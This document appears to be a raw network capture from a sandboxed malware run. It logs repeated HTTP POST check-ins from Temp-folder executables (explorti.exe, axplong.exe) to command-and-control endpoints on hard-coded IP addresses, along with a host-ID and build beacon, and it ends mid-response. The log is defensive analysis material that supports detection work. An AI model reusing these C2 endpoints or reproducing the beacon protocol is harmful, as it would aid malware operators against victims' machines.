                                                                                        Jul 24, 2024 07:15:29.982239008 CEST86OUTGET / HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:15:30.609463930 CEST203INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:15:30 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:15:30.671268940 CEST409OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKE
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 211
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 34 32 41 32 42 37 30 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 2d 2d 0d 0a
                                                                                        Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="hwid"8A42A2B70D8C1730677652------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="build"sila------GCAFCAFHJJDBFIECFBKE--
                                                                                        Jul 24, 2024 07:15:30.869333982 CEST210INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:15:30 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 8
                                                                                        Keep-Alive: timeout=5, max=99
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                        Data Ascii: YmxvY2s=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        42192.168.2.64986977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:30.260301113 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:31.162592888 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:30 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:31.163230896 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:31.397290945 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:31 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        43192.168.2.64987077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:31.173063040 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:31.885435104 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:31 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:31.899945974 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:32.123159885 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        44192.168.2.64987277.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:31.525938988 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:32.220901966 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:32.222117901 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:32.438285112 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        45192.168.2.64987477.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:32.232847929 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:32.921346903 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:32.945871115 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:33.164221048 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        46192.168.2.64987577.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:32.564860106 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:33.277564049 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:33.279597998 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:33.504167080 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        47192.168.2.64987677.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:33.295429945 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:34.029416084 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:34.039223909 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:34.264590025 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        48192.168.2.64987777.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:33.632831097 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:34.351511002 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:34.362701893 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:34.596175909 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        49192.168.2.64987977.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:34.380331039 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:35.106478930 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:35.117052078 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:35.350450039 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:35 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        50192.168.2.64988077.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:34.713386059 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:35.437093973 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:35 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:35.473311901 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:35.704540968 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:35 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        51192.168.2.64988277.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:35.489975929 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:36.177295923 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:36.183419943 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:36.400938988 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:36 GMT
